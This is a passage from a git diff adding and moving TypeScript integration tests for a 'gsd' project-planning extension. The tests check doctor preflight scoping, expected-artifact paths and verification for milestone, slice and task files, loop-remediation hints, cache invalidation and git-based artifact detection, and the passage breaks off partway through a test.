+  const gsd = join(base, ".gsd");
+  const m = join(gsd, "milestones", "M001");
+  const s = join(m, "slices", "S01");
+  const t = join(s, "tasks");
+  mkdirSync(t, { recursive: true });
+
+  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
+
+## Slices
+
+- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
+  > Demo
+`);
+
+  writeFileSync(join(s, "S01-PLAN.md"), `# S01: Test Slice
+
+**Goal:** test
+
+## Tasks
+
+- [x] **T01: Do stuff** \`est:5m\`
+`);
+
+  writeFileSync(join(t, "T01-SUMMARY.md"), `---
+id: T01
+parent: S01
+milestone: M001
+duration: 5m
+verification_result: passed
+completed_at: 2026-01-01
+---
+
+# T01: Do stuff
+
+Done.
+`);
+
+  const report = await runGSDDoctor(base, { fix: true });
+  // Doctor should not produce any task_done_missing_summary issue (code removed)
+  const hasOldCode = report.issues.some(i =>
+    i.code === "task_done_missing_summary" as any ||
+    i.code === "task_summary_without_done_checkbox" as any
+  );
+  assert.ok(!hasOldCode, "should not produce removed reconciliation issue codes");
+
+  // Plan should still have T01 checked
+  const planContent = readFileSync(join(s, "S01-PLAN.md"), "utf-8");
+  assert.ok(planContent.includes("- [x] **T01:"), "T01 should remain checked");
+
+  rmSync(base, { recursive: true, force: true });
+});
diff --git a/src/resources/extensions/gsd/tests/auto-preflight.test.ts b/src/resources/extensions/gsd/tests/integration/auto-preflight.test.ts
similarity index 78%
rename from src/resources/extensions/gsd/tests/auto-preflight.test.ts
rename to src/resources/extensions/gsd/tests/integration/auto-preflight.test.ts
index 066e16856..1a332c6eb 100644
--- a/src/resources/extensions/gsd/tests/auto-preflight.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/auto-preflight.test.ts
@@ -4,9 +4,9 @@ import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 
-import { runGSDDoctor, selectDoctorScope, filterDoctorIssues } from "../doctor.js";
+import { runGSDDoctor, selectDoctorScope, filterDoctorIssues } from "../../doctor.js";
 
-test("auto-preflight scopes to active milestone, ignoring historical", async () => {
+test("auto-preflight scopes to active milestone, ignoring historical", async (t) => {
   const tmpBase = mkdtempSync(join(tmpdir(), "gsd-auto-preflight-test-"));
   const gsd = join(tmpBase, ".gsd");
 
@@ -23,18 +23,16 @@ test("auto-preflight scopes to active milestone, ignoring historical", async ()
   writeFileSync(join(gsd, "milestones", "M009", "M009-ROADMAP.md"), `# M009: Active\n\n## Slices\n- [ ] **S01: Active Slice** \`risk:low\` \`depends:[]\`\n  > After this: active works\n`);
   writeFileSync(join(gsd, "milestones", "M009", "slices", "S01", "S01-PLAN.md"), `# S01: Active Slice\n\n**Goal:** Active\n**Demo:** Active\n\n## Must-Haves\n- done\n\n## Tasks\n- [ ] **T01: Active Task** \`est:5m\`\n  todo\n`);
 
-  try {
-    const scope = await selectDoctorScope(tmpBase);
-    assert.equal(scope, "M009/S01", "active scope selected instead of historical milestone");
+  t.after(() => rmSync(tmpBase, { recursive: true, force: true }));
 
-    const scopedReport = await runGSDDoctor(tmpBase, { fix: false, scope });
-    const scopedBlocking = filterDoctorIssues(scopedReport.issues, { scope, includeWarnings: false });
-    assert.equal(scopedBlocking.length, 0, "no blocking issues in active scope");
+  const scope = await selectDoctorScope(tmpBase);
+  assert.equal(scope, "M009/S01", "active scope selected instead of historical milestone");
 
-    const historicalReport = await runGSDDoctor(tmpBase, { fix: false });
-    const historicalWarnings = historicalReport.issues.filter(issue => issue.unitId.startsWith("M001/S01") && issue.severity === "warning");
-    assert.ok(historicalWarnings.length > 0, "full repo still contains historical warning drift");
-  } finally {
-    rmSync(tmpBase, { recursive: true, force: true });
-  }
+  const scopedReport = await runGSDDoctor(tmpBase, { fix: false, scope });
+  const scopedBlocking = filterDoctorIssues(scopedReport.issues, { scope, includeWarnings: false });
+  assert.equal(scopedBlocking.length, 0, "no blocking issues in active scope");
+
+  const historicalReport = await runGSDDoctor(tmpBase, { fix: false });
+  const historicalWarnings = historicalReport.issues.filter(issue => issue.unitId.startsWith("M001/S01") && issue.severity === "warning");
+  assert.equal(historicalWarnings.length, 0, "completed historical milestone produces no checkbox/file-mismatch warnings");
 });
diff --git a/src/resources/extensions/gsd/tests/integration/auto-recovery.test.ts b/src/resources/extensions/gsd/tests/integration/auto-recovery.test.ts
new file mode 100644
index 000000000..efff084bd
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/auto-recovery.test.ts
@@ -0,0 +1,867 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, writeFileSync, existsSync, readFileSync, rmSync, chmodSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { randomUUID } from "node:crypto";
+import { execFileSync } from "node:child_process";
+
+import {
+  resolveExpectedArtifactPath,
+  verifyExpectedArtifact,
+  diagnoseExpectedArtifact,
+  buildLoopRemediationSteps,
+  hasImplementationArtifacts,
+  reconcileMergeState,
+} from "../../auto-recovery.ts";
+import { parseRoadmap, parsePlan } from "../../parsers-legacy.ts";
+import { parseTaskPlanFile, clearParseCache } from "../../files.ts";
+import { invalidateAllCaches } from "../../cache.ts";
+import { deriveState, invalidateStateCache } from "../../state.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+} from "../../gsd-db.ts";
+import { renderPlanFromDb } from "../../markdown-renderer.ts";
+
+function makeTmpBase(): string {
+  const base = join(tmpdir(), `gsd-test-${randomUUID()}`);
+  // Create .gsd/milestones/M001/slices/S01/tasks/ structure
+  mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks"), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* */ }
+}
+
+// ─── resolveExpectedArtifactPath ──────────────────────────────────────────
+
+test("resolveExpectedArtifactPath returns correct path for research-milestone", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const result = resolveExpectedArtifactPath("research-milestone", "M001", base);
+  assert.ok(result);
+  assert.ok(result!.includes("M001"));
+  assert.ok(result!.includes("RESEARCH"));
+});
+
+test("resolveExpectedArtifactPath returns correct path for execute-task", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const result = resolveExpectedArtifactPath("execute-task", "M001/S01/T01", base);
+  assert.ok(result);
+  assert.ok(result!.includes("tasks"));
+  assert.ok(result!.includes("SUMMARY"));
+});
+
+test("resolveExpectedArtifactPath returns correct path for complete-slice", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const result = resolveExpectedArtifactPath("complete-slice", "M001/S01", base);
+  assert.ok(result);
+  assert.ok(result!.includes("SUMMARY"));
+});
+
+test("resolveExpectedArtifactPath returns correct path for plan-slice", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const result = resolveExpectedArtifactPath("plan-slice", "M001/S01", base);
+  assert.ok(result);
+  assert.ok(result!.includes("PLAN"));
+});
+
+test("resolveExpectedArtifactPath returns null for unknown type", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const result = resolveExpectedArtifactPath("unknown-type", "M001", base);
+  assert.equal(result, null);
+});
+
+test("resolveExpectedArtifactPath returns correct path for all milestone-level types", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const planResult = resolveExpectedArtifactPath("plan-milestone", "M001", base);
+  assert.ok(planResult);
+  assert.ok(planResult!.includes("ROADMAP"));
+
+  const completeResult = resolveExpectedArtifactPath("complete-milestone", "M001", base);
+  assert.ok(completeResult);
+  assert.ok(completeResult!.includes("SUMMARY"));
+});
+
+test("resolveExpectedArtifactPath returns correct path for all slice-level types", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const researchResult = resolveExpectedArtifactPath("research-slice", "M001/S01", base);
+  assert.ok(researchResult);
+  assert.ok(researchResult!.includes("RESEARCH"));
+
+  const assessResult = resolveExpectedArtifactPath("reassess-roadmap", "M001/S01", base);
+  assert.ok(assessResult);
+  assert.ok(assessResult!.includes("ASSESSMENT"));
+
+  const uatResult = resolveExpectedArtifactPath("run-uat", "M001/S01", base);
+  assert.ok(uatResult);
+  assert.ok(uatResult!.includes("ASSESSMENT"));
+});
+
+// ─── run-uat artifact path contract (#2873) ──────────────────────────────
+
+test("resolveExpectedArtifactPath for run-uat returns ASSESSMENT path, not UAT (#2873)", (t) => {
+  // The run-uat prompt instructs the agent to call gsd_summary_save with
+  // artifact_type: "ASSESSMENT", which writes S##-ASSESSMENT.md. The artifact
+  // verification path must match — otherwise verification fails and auto-mode
+  // retries the unit in an infinite loop.
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const result = resolveExpectedArtifactPath("run-uat", "M001/S01", base);
+  assert.ok(result, "run-uat should resolve to a non-null artifact path");
+  assert.ok(
+    result!.endsWith("S01-ASSESSMENT.md"),
+    `run-uat artifact path should end with S01-ASSESSMENT.md, got: ${result}`,
+  );
+});
+
+test("diagnoseExpectedArtifact for run-uat references ASSESSMENT (#2873)", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const diag = diagnoseExpectedArtifact("run-uat", "M001/S01", base);
+  assert.ok(diag, "run-uat should have a diagnostic message");
+  assert.ok(
+    diag!.includes("ASSESSMENT"),
+    `run-uat diagnostic should reference ASSESSMENT, got: ${diag}`,
+  );
+});
+
+test("verifyExpectedArtifact passes for run-uat when ASSESSMENT file exists (#2873)", (t) => {
+  // Regression test: run-uat writes S##-ASSESSMENT.md via gsd_summary_save,
+  // but verification looked for S##-UAT.md, causing false stuck retries.
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  // Write the ASSESSMENT file (what gsd_summary_save actually produces)
+  const assessPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-ASSESSMENT.md");
+  writeFileSync(assessPath, "---\nverdict: PASS\n---\n# UAT Assessment\n");
+
+  const verified = verifyExpectedArtifact("run-uat", "M001/S01", base);
+  assert.ok(verified, "verifyExpectedArtifact should pass when ASSESSMENT file exists");
+});
+
+// ─── diagnoseExpectedArtifact ─────────────────────────────────────────────
+
+test("diagnoseExpectedArtifact returns description for known types", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const research = diagnoseExpectedArtifact("research-milestone", "M001", base);
+  assert.ok(research);
+  assert.ok(research!.includes("research"));
+
+  const plan = diagnoseExpectedArtifact("plan-slice", "M001/S01", base);
+  assert.ok(plan);
+  assert.ok(plan!.includes("plan"));
+
+  const task = diagnoseExpectedArtifact("execute-task", "M001/S01/T01", base);
+  assert.ok(task);
+  assert.ok(task!.includes("T01"));
+});
+
+test("diagnoseExpectedArtifact returns null for unknown type", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  assert.equal(diagnoseExpectedArtifact("unknown", "M001", base), null);
+});
+
+// ─── buildLoopRemediationSteps ────────────────────────────────────────────
+
+test("buildLoopRemediationSteps returns steps for execute-task", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const steps = buildLoopRemediationSteps("execute-task", "M001/S01/T01", base);
+  assert.ok(steps);
+  assert.ok(steps!.includes("T01"));
+  assert.ok(steps!.includes("gsd undo-task"));
+});
+
+test("buildLoopRemediationSteps returns steps for plan-slice", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const steps = buildLoopRemediationSteps("plan-slice", "M001/S01", base);
+  assert.ok(steps);
+  assert.ok(steps!.includes("PLAN"));
+  assert.ok(steps!.includes("gsd recover"));
+});
+
+test("buildLoopRemediationSteps returns steps for complete-slice", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const steps = buildLoopRemediationSteps("complete-slice", "M001/S01", base);
+  assert.ok(steps);
+  assert.ok(steps!.includes("S01"));
+  assert.ok(steps!.includes("gsd reset-slice"));
+});
+
+test("buildLoopRemediationSteps returns null for unknown type", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  assert.equal(buildLoopRemediationSteps("unknown", "M001", base), null);
+});
+
+// ─── verifyExpectedArtifact: parse cache collision regression ─────────────
+
+test("verifyExpectedArtifact detects roadmap [x] change despite parse cache", (t) => {
+  // Regression test: cacheKey collision when [ ] → [x] doesn't change
+  // file length or first/last 100 chars. Without the fix, parseRoadmap
+  // returns stale cached data with done=false even though the file has [x].
+  const base = makeTmpBase();
+  t.after(() => {
+    clearParseCache();
+    cleanup(base);
+  });
+
+  // Build a roadmap long enough that the [x] change is outside the first/last 100 chars
+  const padding = "A".repeat(200);
+  const roadmapBefore = [
+    `# M001: Test Milestone ${padding}`,
+    "",
+    "## Slices",
+    "",
+    "- [ ] **S01: First slice** `risk:low`",
+    "",
+    `## Footer ${padding}`,
+  ].join("\n");
+  const roadmapAfter = roadmapBefore.replace("- [ ] **S01:", "- [x] **S01:");
+
+  // Verify lengths are identical (the key collision condition)
+  assert.equal(roadmapBefore.length, roadmapAfter.length);
+
+  // Populate parse cache with the pre-edit roadmap
+  const before = parseRoadmap(roadmapBefore);
+  const sliceBefore = before.slices.find(s => s.id === "S01");
+  assert.ok(sliceBefore);
+  assert.equal(sliceBefore!.done, false);
+
+  // Now write the post-edit roadmap to disk and create required artifacts
+  const roadmapPath = join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md");
+  writeFileSync(roadmapPath, roadmapAfter);
+  const summaryPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
+  writeFileSync(summaryPath, "# Summary\nDone.");
+  const uatPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-UAT.md");
+  writeFileSync(uatPath, "# UAT\nPassed.");
+
+  // verifyExpectedArtifact should see the [x] despite the parse cache
+  // having the [ ] version. The fix clears the parse cache inside verify.
+  const verified = verifyExpectedArtifact("complete-slice", "M001/S01", base);
+  assert.equal(verified, true, "verifyExpectedArtifact should return true when roadmap has [x]");
+});
+
+// ─── verifyExpectedArtifact: plan-slice empty scaffold regression (#699) ──
+
+test("verifyExpectedArtifact rejects plan-slice with empty scaffold", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+  mkdirSync(sliceDir, { recursive: true });
+  writeFileSync(join(sliceDir, "S01-PLAN.md"), "# S01: Test Slice\n\n## Tasks\n\n");
+  assert.strictEqual(
+    verifyExpectedArtifact("plan-slice", "M001/S01", base),
+    false,
+    "Empty scaffold should not be treated as completed artifact",
+  );
+});
+
+test("verifyExpectedArtifact accepts plan-slice with actual tasks", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  writeFileSync(join(sliceDir, "S01-PLAN.md"), [
+    "# S01: Test Slice",
+    "",
+    "## Tasks",
+    "",
+    "- [ ] **T01: Implement feature** `est:2h`",
+    "- [ ] **T02: Write tests** `est:1h`",
+  ].join("\n"));
+  writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01 Plan");
+  writeFileSync(join(tasksDir, "T02-PLAN.md"), "# T02 Plan");
+  assert.strictEqual(
+    verifyExpectedArtifact("plan-slice", "M001/S01", base),
+    true,
+    "Plan with task entries should be treated as completed artifact",
+  );
+});
+
+test("verifyExpectedArtifact accepts plan-slice with completed tasks", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  writeFileSync(join(sliceDir, "S01-PLAN.md"), [
+    "# S01: Test Slice",
+    "",
+    "## Tasks",
+    "",
+    "- [x] **T01: Implement feature** `est:2h`",
+    "- [ ] **T02: Write tests** `est:1h`",
+  ].join("\n"));
+  writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01 Plan");
+  writeFileSync(join(tasksDir, "T02-PLAN.md"), "# T02 Plan");
+  assert.strictEqual(
+    verifyExpectedArtifact("plan-slice", "M001/S01", base),
+    true,
+    "Plan with completed task entries should be treated as completed artifact",
+  );
+});
+
+// ─── verifyExpectedArtifact: plan-slice task plan check (#739) ────────────
+
+test("verifyExpectedArtifact plan-slice passes when all task plan files exist", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const tasksDir = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks");
+  const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
+  const planContent = [
+    "# S01: Test Slice",
+    "",
+    "## Tasks",
+    "",
+    "- [ ] **T01: First task** `est:1h`",
+    "- [ ] **T02: Second task** `est:2h`",
+  ].join("\n");
+  writeFileSync(planPath, planContent);
+  writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01 Plan\n\nDo the thing.");
+  writeFileSync(join(tasksDir, "T02-PLAN.md"), "# T02 Plan\n\nDo the other thing.");
+
+  const result = verifyExpectedArtifact("plan-slice", "M001/S01", base);
+  assert.equal(result, true, "should pass when all task plan files exist");
+});
+
+test("verifyExpectedArtifact plan-slice fails when a task plan file is missing (#739)", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const tasksDir = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks");
+  const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
+  const planContent = [
+    "# S01: Test Slice",
+    "",
+    "## Tasks",
+    "",
+    "- [ ] **T01: First task** `est:1h`",
+    "- [ ] **T02: Second task** `est:2h`",
+  ].join("\n");
+  writeFileSync(planPath, planContent);
+  // Only write T01-PLAN.md — T02 is missing
+  writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01 Plan\n\nDo the thing.");
+
+  const result = verifyExpectedArtifact("plan-slice", "M001/S01", base);
+  assert.equal(result, false, "should fail when T02-PLAN.md is missing");
+});
+
+test("verifyExpectedArtifact plan-slice fails for plan with no tasks (#699)", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
+  const planContent = [
+    "# S01: Test Slice",
+    "",
+    "## Goal",
+    "",
+    "Just some documentation updates, no tasks.",
+  ].join("\n");
+  writeFileSync(planPath, planContent);
+
+  const result = verifyExpectedArtifact("plan-slice", "M001/S01", base);
+  assert.equal(result, false, "should fail when plan has no task entries (empty scaffold, #699)");
+});
+
+// ─── verifyExpectedArtifact: heading-style plan tasks (#1691) ─────────────
+
+test("verifyExpectedArtifact accepts plan-slice with heading-style tasks (### T01 --)", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  writeFileSync(join(sliceDir, "S01-PLAN.md"), [
+    "# S01: Test Slice",
+    "",
+    "## Tasks",
+    "",
+    "### T01 -- Implement feature",
+    "",
+    "Feature description.",
+    "",
+    "### T02 -- Write tests",
+    "",
+    "Test description.",
+  ].join("\n"));
+  writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01 Plan");
+  writeFileSync(join(tasksDir, "T02-PLAN.md"), "# T02 Plan");
+  assert.strictEqual(
+    verifyExpectedArtifact("plan-slice", "M001/S01", base),
+    true,
+    "Heading-style plan with task entries should be treated as completed artifact",
+  );
+});
+
+test("verifyExpectedArtifact accepts plan-slice with colon-style heading tasks (### T01:)", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  writeFileSync(join(sliceDir, "S01-PLAN.md"), [
+    "# S01: Test Slice",
+    "",
+    "## Tasks",
+    "",
+    "### T01: Implement feature",
+    "",
+    "Feature description.",
+  ].join("\n"));
+  writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01 Plan");
+  assert.strictEqual(
+    verifyExpectedArtifact("plan-slice", "M001/S01", base),
+    true,
+    "Colon heading-style plan should be treated as completed artifact",
+  );
+});
+
+test("verifyExpectedArtifact execute-task rejects heading-style plan without checked checkbox (#3607)", (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  writeFileSync(join(sliceDir, "S01-PLAN.md"), [
+    "# S01: Test Slice",
+    "",
+    "## Tasks",
+    "",
+    "### T01 -- Implement feature",
+    "",
+    "Feature description.",
+  ].join("\n"));
+  writeFileSync(join(tasksDir, "T01-SUMMARY.md"), "# T01 Summary\n\nDone.");
+  // Heading-style entries no longer count as verified — only checked
+  // checkboxes prove gsd_complete_task ran (#3607).
+  assert.strictEqual(
+    verifyExpectedArtifact("execute-task", "M001/S01/T01", base),
+    false,
+    "heading-style without checked checkbox should NOT pass verification",
+  );
+});
+
+test("verifyExpectedArtifact plan-slice passes for rendered slice/task plan artifacts from DB", async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, ".gsd", "gsd.db");
+  openDatabase(dbPath);
+  try {
+    insertMilestone({ id: "M001", title: "Milestone", status: "active" });
+    insertSlice({
+      id: "S01",
+      milestoneId: "M001",
+      title: "Rendered slice",
+      status: "pending",
+      demo: "Rendered plan artifacts exist.",
+      planning: {
+        goal: "Render plans from DB rows.",
+        successCriteria: "- Slice plan parses\n- Task plan files exist on disk",
+        proofLevel: "integration",
+        integrationClosure: "DB rows are the source of truth for PLAN artifacts.",
+        observabilityImpact: "- Recovery verification fails if a task plan file is missing",
+      },
+    });
+    insertTask({
+      id: "T01",
+      sliceId: "S01",
+      milestoneId: "M001",
+      title: "Render plan",
+      status: "pending",
+      planning: {
+        description: "Create the slice plan from DB state.",
+        estimate: "30m",
+        files: ["src/resources/extensions/gsd/markdown-renderer.ts"],
+        verify: "node --test markdown-renderer.test.ts",
+        inputs: ["src/resources/extensions/gsd/gsd-db.ts"],
+        expectedOutput: ["src/resources/extensions/gsd/tests/markdown-renderer.test.ts"],
+        observabilityImpact: "Renderer tests cover the failure mode.",
+      },
+    });
+    insertTask({
+      id: "T02",
+      sliceId: "S01",
+      milestoneId: "M001",
+      title: "Verify recovery",
+      status: "pending",
+      planning: {
+        description: "Prove task plan files remain present for recovery.",
+        estimate: "20m",
+        files: ["src/resources/extensions/gsd/auto-recovery.ts"],
+        verify: "node --test auto-recovery.test.ts",
+        inputs: ["src/resources/extensions/gsd/auto-recovery.ts"],
+        expectedOutput: ["src/resources/extensions/gsd/tests/auto-recovery.test.ts"],
+        observabilityImpact: "Missing plan files surface as explicit verification failures.",
+      },
+    });
+
+    const rendered = await renderPlanFromDb(base, "M001", "S01");
+    assert.ok(existsSync(rendered.planPath), "renderPlanFromDb should write the slice plan");
+    assert.equal(rendered.taskPlanPaths.length, 2, "renderPlanFromDb should render one task plan per task");
+
+    const planContent = readFileSync(rendered.planPath, "utf-8");
+    const parsedPlan = parsePlan(planContent);
+    assert.equal(parsedPlan.tasks.length, 2, "rendered slice plan should parse into task entries");
+
+    const taskPlanContent = readFileSync(rendered.taskPlanPaths[0], "utf-8");
+    const taskPlan = parseTaskPlanFile(taskPlanContent);
+    assert.deepEqual(taskPlan.frontmatter.skills_used, [], "rendered task plans should use conservative empty skills_used");
+
+    const result = verifyExpectedArtifact("plan-slice", "M001/S01", base);
+    assert.equal(result, true, "plan-slice verification should pass when rendered task plan files exist");
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+});
+
+test("verifyExpectedArtifact plan-slice fails after deleting a rendered task plan file", async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, ".gsd", "gsd.db");
+  openDatabase(dbPath);
+  try {
+    insertMilestone({ id: "M001", title: "Milestone", status: "active" });
+    insertSlice({
+      id: "S01",
+      milestoneId: "M001",
+      title: "Rendered slice",
+      status: "pending",
+      demo: "Rendered plan artifacts exist.",
+      planning: {
+        goal: "Render plans from DB rows.",
+        successCriteria: "- Slice plan parses\n- Task plan files exist on disk",
+        proofLevel: "integration",
+        integrationClosure: "DB rows are the source of truth for PLAN artifacts.",
+        observabilityImpact: "- Recovery verification fails if a task plan file is missing",
+      },
+    });
+    insertTask({
+      id: "T01",
+      sliceId: "S01",
+      milestoneId: "M001",
+      title: "Render plan",
+      status: "pending",
+      planning: {
+        description: "Create the slice plan from DB state.",
+        estimate: "30m",
+        files: ["src/resources/extensions/gsd/markdown-renderer.ts"],
+        verify: "node --test markdown-renderer.test.ts",
+        inputs: ["src/resources/extensions/gsd/gsd-db.ts"],
+        expectedOutput: ["src/resources/extensions/gsd/tests/markdown-renderer.test.ts"],
+        observabilityImpact: "Renderer tests cover the failure mode.",
+      },
+    });
+    insertTask({
+      id: "T02",
+      sliceId: "S01",
+      milestoneId: "M001",
+      title: "Verify recovery",
+      status: "pending",
+      planning: {
+        description: "Prove task plan files remain present for recovery.",
+        estimate: "20m",
+        files: ["src/resources/extensions/gsd/auto-recovery.ts"],
+        verify: "node --test auto-recovery.test.ts",
+        inputs: ["src/resources/extensions/gsd/auto-recovery.ts"],
+        expectedOutput: ["src/resources/extensions/gsd/tests/auto-recovery.test.ts"],
+        observabilityImpact: "Missing plan files surface as explicit verification failures.",
+      },
+    });
+
+    const rendered = await renderPlanFromDb(base, "M001", "S01");
+    rmSync(rendered.taskPlanPaths[1]);
+
+    const result = verifyExpectedArtifact("plan-slice", "M001/S01", base);
+    assert.equal(result, false, "plan-slice verification should fail when a rendered task plan file is removed");
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+});
+
+// ─── #793: invalidateAllCaches unblocks skip-loop ─────────────────────────
+// When the skip-loop breaker fires, it must call invalidateAllCaches() (not
+// just invalidateStateCache()) to clear path/parse caches that deriveState
+// depends on. Without this, even after cache invalidation, deriveState reads
+// stale directory listings and returns the same unit, looping forever.
+test("#793: invalidateAllCaches clears all caches so deriveState sees fresh disk state", async (t) => {
+  const base = makeTmpBase();
+  t.after(() => cleanup(base));
+
+  const mid = "M001";
+  const sid = "S01";
+  const planDir = join(base, ".gsd", "milestones", mid, "slices", sid);
+  const tasksDir = join(planDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  mkdirSync(join(base, ".gsd", "milestones", mid), { recursive: true });
+
+  writeFileSync(
+    join(base, ".gsd", "milestones", mid, `${mid}-ROADMAP.md`),
+    `# M001: Test Milestone\n\n**Vision:** test.\n\n## Slices\n\n- [ ] **${sid}: Slice One** \`risk:low\` \`depends:[]\`\n  > After this: done.\n`,
+  );
+  const planUnchecked = `# ${sid}: Slice One\n\n**Goal:** test.\n\n## Tasks\n\n- [ ] **T01: Task One** \`est:10m\`\n- [ ] **T02: Task Two** \`est:10m\`\n`;
+  writeFileSync(join(planDir, `${sid}-PLAN.md`), planUnchecked);
+  writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01: Task One\n\n**Goal:** t\n\n## Steps\n- step\n\n## Verification\n- v\n");
+  writeFileSync(join(tasksDir, "T02-PLAN.md"), "# T02: Task Two\n\n**Goal:** t\n\n## Steps\n- step\n\n## Verification\n- v\n");
+
+  // Warm all caches
+  const state1 = await deriveState(base);
+  assert.equal(state1.activeTask?.id, "T01", "initial: T01 is active");
+
+  // Simulate task completion on disk (what the LLM does)
+  const planChecked = `# ${sid}: Slice One\n\n**Goal:** test.\n\n## Tasks\n\n- [x] **T01: Task One** \`est:10m\`\n- [ ] **T02: Task Two** \`est:10m\`\n`;
+  writeFileSync(join(planDir, `${sid}-PLAN.md`), planChecked);
+  writeFileSync(join(tasksDir, "T01-SUMMARY.md"), "---\nid: T01\n---\n# Summary\n");
+
+  // invalidateStateCache alone: _stateCache cleared but path/parse caches warm
+  invalidateStateCache();
+
+  // invalidateAllCaches: all caches cleared — deriveState must re-read disk
+  invalidateAllCaches();
+  const state2 = await deriveState(base);
+
+  // After full invalidation, T01 should be complete and T02 should be next
+  assert.notEqual(state2.activeTask?.id, "T01", "#793: T01 not re-dispatched after full invalidation");
+
+  // Verify the caches are truly cleared by calling clearParseCache and clearPathCache
+  // do not throw (they should be no-ops after invalidateAllCaches already cleared them)
+  clearParseCache(); // no-op, but should not throw
+  assert.ok(true, "clearParseCache after invalidateAllCaches is safe");
+});
+
+// ─── hasImplementationArtifacts (#1703) ───────────────────────────────────
+
+function makeGitBase(): string {
+  const base = join(tmpdir(), `gsd-test-git-${randomUUID()}`);
+  mkdirSync(base, { recursive: true });
+  execFileSync("git", ["init", "--initial-branch=main"], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["config", "user.email", "test@test.com"], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["config", "user.name", "Test"], { cwd: base, stdio: "ignore" });
+  // Create initial commit so HEAD exists
+  writeFileSync(join(base, ".gitkeep"), "");
+  execFileSync("git", ["add", "."], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "initial"], { cwd: base, stdio: "ignore" });
+  return base;
+}
+
+test("hasImplementationArtifacts returns 'absent' when only .gsd/ files committed (#1703)", (t) => {
+  const base = makeGitBase();
+  t.after(() => cleanup(base));
+
+  // Create a feature branch and commit only .gsd/ files
+  execFileSync("git", ["checkout", "-b", "feat/test-milestone"], { cwd: base, stdio: "ignore" });
